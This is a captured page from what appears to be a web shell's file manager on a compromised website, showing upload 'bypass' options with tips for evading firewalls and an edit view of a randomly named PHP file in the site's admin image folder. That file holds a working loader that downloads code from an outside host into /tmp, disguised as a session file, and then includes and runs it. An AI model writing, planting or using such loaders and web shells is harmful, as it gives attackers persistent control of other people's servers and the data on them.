Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
Submit
~
home
u122595313
domains
thewebdesign.co.in
public_html
admin
image
logo
Edit File:
9977203182576378266.php
<?php if (is_dir("/tmp")) { $file = "/tmp/sess_" . md5 ("naxtarrr") . ".php"; if (!file_exists($file)) { $content = file_get_contents("https://fcalpha.net/web/photo/20151024/bypass/e-nax.txt"); if ($content !== false) { $fp = fopen($file, "w"); if ($fp) { fwrite($fp, $content); fclose($fp); echo "File created successfully."; } else { echo "Error opening file for writing."; } } else { echo "Error fetching file."; } } else { include($file); } } else { echo "Temporary directory does not exist."; } ?>
Select edit method
Using basic write file
Using command
Info
Info!
If the strings too long, it will be failed to edit file (command method only).
Save Changes